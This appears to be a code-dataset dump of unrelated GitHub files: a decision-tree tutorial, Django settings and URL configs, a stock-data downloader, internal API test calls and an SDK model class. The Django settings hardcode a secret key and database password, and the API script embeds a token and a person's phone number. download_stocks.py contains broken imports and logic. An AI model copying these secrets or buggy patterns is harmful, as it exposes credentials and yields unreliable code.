# You just take the averages of each of the terminal leaves; you take the average of the y-values for all of the
# points in a particular leaf and thats your y_pred which is assigned to any new data point in that leaf and is done
# so using a decision tree, hence the name. :)
#
#Information entropy is the average rate at which information is produced
#by a stochastic source of data. The measure of information entropy associated
#with each possible data value is the negative logarithm of the probability
#mass function for the value...see wikipedia
# Importing the libraries
import numpy as np #import standard data libraries
import matplotlib.pyplot as plt #import matplotlib.pylot as plt
import pandas as pd #import pandas as pd
# Importing the dataset make sure the current directory is switched
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
y = dataset.iloc[:, 2:].values
# Splitting the dataset into the Training set and Test set
"""from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)"""
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
# Fitting Decision Tree Regression to the dataset
#Creating our decision tree regressor
from sklearn.tree import DecisionTreeRegressor #importing DecisionTreeRegressor class from sklearn.tree
regressor = DecisionTreeRegressor(random_state = 0) #creating our DecisionTreeRegressor object called regressor
# default criterion = mse or mean squared error (so we are taking the squared difference between the prediction
# and the actual result, and then taking the sum of those distances to measure the error. very good and common criterion)
# then you have some other parameters like splitter and max_features which is for a more advanced approach of how
# to build the decision tree. (there's a lot of parameters you can choose)
# we let the random state = 0 so that we all get the same result..for example purposes
regressor.fit(X, y) #final step is to FIT the regressor object to our dataset
#regressor.fitMethod(X our matrix of features, y our dependent variable vector)
# Predicting a new result
y_pred = regressor.predict(6.5)
#Now saving the best part for last...the regression results VISUALIZED
#It should have the appearance of a piecewise function...model is non-continuous
#the value for a prediction should be a constant average for each prediction on each interval
# Visualising the Decision Tree Regression results (higher resolution)
X_grid = np.arange(min(X), max(X), 0.01) #you need to do this so that we get a higher resolution picture
X_grid = X_grid.reshape((len(X_grid), 1)) # if you graph using basic technique, you'll get something that looks like
plt.scatter(X, y, color = 'red') # a linear regression model...so we "PLOT" more points
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
#As you can see, the decision tree regression model is predicting the average
#Check out random forest next. They're pretty much a team of decision trees! :)
|
[
"noreply@github.com"
] |
samariotorres.noreply@github.com
|
832ff4fb7f956ba71e8669aad94428fc4e8bc4ef
|
917670aa0657612aea5f677c3d9b4ca07acce36f
|
/period.py
|
020ff36fe8f02baed3e00162d6ceb6a0caac1edf
|
[
"MIT"
] |
permissive
|
Necrophote/demotvcrawl
|
7451b69690b8fba91d205dd1ce04494411e623d0
|
21b10d377e9bc51c6410336efff257a31d8ac3a1
|
refs/heads/main
| 2023-01-20T20:47:29.935251
| 2020-11-29T16:21:04
| 2020-11-29T16:21:04
| 303,712,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
import os
import time, threading
def foo():
os.system("start crawl.bat")
print(time.ctime())
threading.Timer(3600, foo).start()
foo()
|
[
"noreply@github.com"
] |
Necrophote.noreply@github.com
|
1b15671ce7700da10174ab0bd1ec8dc68a157fe8
|
04edf551ccc291421e21d2fe1dd88a3daf3aa5b6
|
/espiga/settings.py
|
335fa36d0ece88164cee3d5e3a0cac4bfc7f6929
|
[] |
no_license
|
warleysystem/sistema_espiga
|
7c559f68600d8820c635df85d932a739ada9b8f4
|
619164b667169a6fa066c5bce4d89847e1a2db51
|
refs/heads/master
| 2021-01-15T22:58:21.357538
| 2011-04-07T11:38:23
| 2011-04-07T11:38:23
| 1,581,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,629
|
py
|
# Django settings for espiga project.
import os, platform
PROJECT_ROOT_PATH = os.path.dirname(os.path.abspath(__file__))
MEDIA_ROOT_PATH = PROJECT_ROOT_PATH
MEDIA_ROOT_URL = '/espiga/'
MEDIA_ROOT_URL_ADMIN = '/'
LOCAL = True
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'espiga', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
'PASSWORD': 'postgres', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Araguaina'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'pt-br'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(MEDIA_ROOT_PATH, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = MEDIA_ROOT_URL + 'media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = MEDIA_ROOT_URL + 'media/admin_media1.3/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ru_ld)yn6c!v-$1#)dhr2_$x)r$+9=gxxm-zxsmmuft2l3dvfr'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
AUTH_PROFILE_MODULE = 'espiga.perfilinicial'
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT_PATH, 'templates'),
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'noticia',
'bancoimagem',
#'arquivo',
'enquete',
'perfilinicial',
'video',
'upload',
'servico',
'publicidade',
'configuracoes',
'link',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"flaviohcf@gmail.com"
] |
flaviohcf@gmail.com
|
812fc692d35e71f7c0b0eada335f86fefac1c3e0
|
4668b5e3d5dc1e4b6e6d8b0a0f698f1d338a013b
|
/practice/InterFacePractice/BiaoYang.py
|
aaa2d34d52dc9ec4df814dc19de93ac311b6d508
|
[] |
no_license
|
Hardworking-tester/HuaYingAPP
|
d0ac9b915fc22501577b9e5e6e2d0ec772b32af8
|
8cf74adbc1db62fe27bb8d75adccae25eef49389
|
refs/heads/master
| 2021-01-24T06:40:22.469601
| 2017-06-02T13:24:59
| 2017-06-02T13:24:59
| 42,506,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
# encoding:utf-8
import urllib
import urllib2
import httplib
class Tt1():
#表扬
def biaoYang(self):
web_url='http://192.168.1.241:8080/zhsq/client/owner_repair!save.action'
values = {'token':'6m3ou41429594424828','stewardId':'402881714e0a715e014e0a7479600000,402881714e0a715e014e0a9943bf000b,402881714e0a715e014e0a99cb63000c,402881714e0a715e014e0a751d910001,402881714e0a715e014e0a77ed6a0002,402881714e0a715e014e0a7a333d0003,402881ea4e09af57014e09b2651f0000','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002',
'ownerRepair.member.id':'4028813c4cda5ee7014cda77c5fc0001','ownerRepair.ownerName':'王伟高',
'ownerRepair.OwnerPhone':'15093492821','ownerRepair.ownerAddr':'宏江中央广场','ownerRepair.imageContent':'','ownerRepair.repairDescribe':'保安、保洁等物业管理人员都很负责任2222','ownerRepair.useFlag':5}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
#查看表扬
def chaKanBiaoYang(self):
# web_url='http://192.168.1.241:8080/zhsq/client/owner_repair!listByProcessFlag.action'
web_url='http://192.168.1.241:9080/zhsqitfe/client/owner_repair!listByProcessFlag.action'
values = {'token':'6m3ou41429594424828','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002','ownerRepair.useFlag':5,'ownerRepair.processFlag':0,'pager.pageNumber':1,'pager.pageSize':'','pager.orderBy':'','pager.order':''}
# values = {'token':'6m3ou41429594424828','ownerRepair.owner.id':'402881714dc2e54c014dd0c979a90002','ownerRepair.useFlag':5,'ownerRepair.processFlag':0,'pager.pageNumber':'','pager.pageSize':1,'pager.orderBy':'','pager.order':''}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
#获取物业角色列表
def getWuYeJueSeList(self):
web_url='http://192.168.1.241:9080/zhsqitfe/client/owner_repair!getStewardListByMember.action'
values = {'token':'6m3ou41429594424828','steward.roleType':100}
data1=urllib.urlencode(values)
req=urllib2.Request(web_url,data1)
rep=urllib2.urlopen(req)
paga=rep.read()
print paga
pp=Tt1()
# pp.biaoYang()
pp.chaKanBiaoYang()
# pp.getWuYeJueSeList()
|
[
"373391120@qq.com"
] |
373391120@qq.com
|
fc02747ee5fad59c76ecb639e240238121325320
|
77a543ef8b3501c152dfa18fab3f3c14b21f2a1d
|
/sanscom/utils/urls.py
|
2a9c6be520d480b38409af6ef4122dbbd2790d48
|
[
"BSD-3-Clause"
] |
permissive
|
ouhouhsami/django-sanscom
|
c483d3461ca51684894e41045f2849814e91cf3e
|
38f4837795bdaf8d7151241e9c03f934ec25efed
|
refs/heads/master
| 2020-04-05T23:26:30.568324
| 2013-09-09T20:10:26
| 2013-09-09T20:10:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,938
|
py
|
#-*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from geoads.views import (AdDetailView, AdSearchDeleteView,
AdSearchUpdateView, AdCreateView, CompleteView,
AdPotentialBuyersView, AdPotentialBuyerContactView)
from geoads.contrib.moderation.views import ModeratedAdUpdateView
from sanscom.utils.views import CustomAdDeleteView
from sanscom.utils.forms import PrettyAdPictureForm, HomeContactForm, CustomAdSearchUpdateForm
def ads_urlpatterns(AdModel, AdSearchModel, AdSearchResultModel, AdForm, AdSearchView):
urlpatterns = patterns('',
url(r'^(?P<slug>[-\w]+)$', AdDetailView.as_view(model=AdModel, contact_form=HomeContactForm), name="view"),
url(r'^search/$', AdSearchView.as_view(model=AdModel), name='search'),
url(r'^search/(?P<search_id>\d+)/$', AdSearchView.as_view(), name='search'),
url(r'^delete_search/(?P<pk>\d+)$', AdSearchDeleteView.as_view(model=AdSearchModel), name='delete_search'),
url(r'^edit_search/(?P<pk>\d+)$', AdSearchUpdateView.as_view(model=AdSearchModel, form_class=CustomAdSearchUpdateForm), name="update_search"),
url(r'^add/$', AdCreateView.as_view(model=AdModel, form_class=AdForm, ad_picture_form=PrettyAdPictureForm), name='add'),
url(r'^add/complete/$', CompleteView.as_view(), name='complete'),
url(r'^(?P<pk>\d+)/edit$', ModeratedAdUpdateView.as_view(model=AdModel, form_class=AdForm, ad_picture_form=PrettyAdPictureForm), name='edit'),
url(r'^(?P<pk>\d+)/delete$', CustomAdDeleteView.as_view(model=AdModel), name='delete'),
url(r'^contact_buyers/(?P<pk>\d+)$', AdPotentialBuyersView.as_view(model=AdModel, search_model=AdSearchResultModel), name="contact_buyers"),
url(r'^contact_buyer/(?P<adsearchresult_id>\d+)$', AdPotentialBuyerContactView.as_view(model_class=AdSearchResultModel), name="contact_buyer"),
)
return urlpatterns
|
[
"samuel.goldszmidt@gmail.com"
] |
samuel.goldszmidt@gmail.com
|
c7d1c021adb9a0479f9a0c56b4f62e21fcf449c7
|
9dbd877adf6d89583b83a5769a63af627f5b1130
|
/download_stocks.py
|
95c76acf3d3cf57ffc43b960a5d8f7717b9b1289
|
[] |
no_license
|
jachang820/stock-patterns
|
5c8a07230a17f4c1f3674c17608125bc0d4ded17
|
1796d67f5e5b4f3b4a3923e7fe569dd7cacefd82
|
refs/heads/master
| 2022-12-08T16:03:57.147154
| 2020-08-27T05:51:15
| 2020-08-27T05:51:15
| 290,448,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
import urllib.request, json
from datetime import date
from variables.py import hidden_variables
query = "https://www.alphavantage.co/query"
api_key = hidden_variables['AV_KEY']
def _download_data_from_api(url):
with urllib.request.urlopen(url):
data = json.loads(url.read().decode())
return data
def _get_output_size(symbol, last_updated):
if date.today() - last_updated < 100:
output_size = "compact"
else:
output_size = "full"
return output_size
def download_time_series(symbol, last_updated):
function = "TIME_SERIES_DAILY_ADJUSTED"
output_size = _get_output_size(symbol, last_updated)
url = "{0}?function={1}&symbol={2}&outputsize={3}&apikey={4}".format(
query, function, symbol, output_size, api_key)
return _download_data_from_api(url)
def download_fx_series(from_symbol, to_symbol, last_updated):
function = "FX_DAILY"
output_size = _get_output_size("{0}-{1}".format(from_symbol, to_symbol), last_updated)
url = "{0}?function={1}&from_symbol={2}&to_symbol={3}&outputsize={4}&apikey={5}".format(
query, function, from_symbol, to_symbol, output_size, api_key)
return _download_data_from_api(url)
def _download_fundamentals(symbol, function):
url = "{0}?function={1}&symbol={2}&apikey={3}".format(
query, function, symbol, api_key)
return _download_data_from_api(url)
def download_company_overview(symbol):
function = "OVERVIEW"
return _download_fundamentals(symbol, function)
def download_income_statement(symbol):
function = "INCOME_STATEMENT"
return _download_fundamentals(symbol, function)
def download_balance_sheet(symbol):
function = "BALANCE_SHEET"
return _download_fundamentals(symbol, function)
def download_cash_flow(symbol):
function = "CASH_FLOW"
return _download_fundamentals(symbol, function)
|
[
"j.a.chang820@gmail.com"
] |
j.a.chang820@gmail.com
|
0be1345d423841c47b788d0c3e2db0cca56488f8
|
30cffb7452220c2ac2961dd2e0f42e3b359a59c0
|
/simscale_sdk/models/inside_region_refinement_with_length.py
|
d640c7685de5b48d25996222389744f8de715d77
|
[
"MIT"
] |
permissive
|
vpurcarea/simscale-python-sdk
|
0bf892d8824f8d4599caa0f345d5ba28e038f5eb
|
6f2d12b2d21142bd854042c0fb402c2c797629e4
|
refs/heads/master
| 2023-03-14T04:31:06.226337
| 2021-03-03T16:20:01
| 2021-03-03T16:20:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,189
|
py
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class InsideRegionRefinementWithLength(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'length': 'DimensionalLength'
}
attribute_map = {
'type': 'type',
'length': 'length'
}
def __init__(self, type='INSIDE', length=None, local_vars_configuration=None): # noqa: E501
"""InsideRegionRefinementWithLength - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._length = None
self.discriminator = None
self.type = type
if length is not None:
self.length = length
@property
def type(self):
"""Gets the type of this InsideRegionRefinementWithLength. # noqa: E501
:return: The type of this InsideRegionRefinementWithLength. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this InsideRegionRefinementWithLength.
:param type: The type of this InsideRegionRefinementWithLength. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def length(self):
"""Gets the length of this InsideRegionRefinementWithLength. # noqa: E501
:return: The length of this InsideRegionRefinementWithLength. # noqa: E501
:rtype: DimensionalLength
"""
return self._length
@length.setter
def length(self, length):
"""Sets the length of this InsideRegionRefinementWithLength.
:param length: The length of this InsideRegionRefinementWithLength. # noqa: E501
:type: DimensionalLength
"""
self._length = length
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InsideRegionRefinementWithLength):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InsideRegionRefinementWithLength):
return True
return self.to_dict() != other.to_dict()
|
[
"simscale"
] |
simscale
|
315a23ef405af371a30728983dc84b9cc0441de4
|
888a6485c8ace68b7129a11bc658746f1d23cceb
|
/search/urls.py
|
c316cf881dbc798233c8138d1d5f227538e10020
|
[] |
no_license
|
looksocii/Blog_System
|
cbb32104d7d6d31a24bb9864816c0d75b86e21f9
|
52598dc617104201c9ad387f0bff8ec41c8b32b0
|
refs/heads/master
| 2021-09-08T20:17:11.444456
| 2021-08-27T14:26:35
| 2021-08-27T14:26:35
| 246,037,346
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('register/', views.my_register, name='register'),
path('creator/', views.creator, name='creator'),
path('post/', views.post, name='post'),
path('changepass/', views.change_pass, name='change_pass'),
path('blog/<int:num>/', views.blog, name='blog'),
path('blog/<int:blog>/<int:com_remv>/', views.com_remove, name='com_remove'),
path('postremove/<int:post_id>/', views.post_remove, name='post_remove'),
path('editblog/<int:blogedit>/', views.edit_blog, name='edit_blog'),
path('editcom/<int:comedit>/', views.edit_com, name='edit_com'),
path('status/<int:change_status>/', views.status, name='status'),
]
|
[
"aopup1122@gmail.com"
] |
aopup1122@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.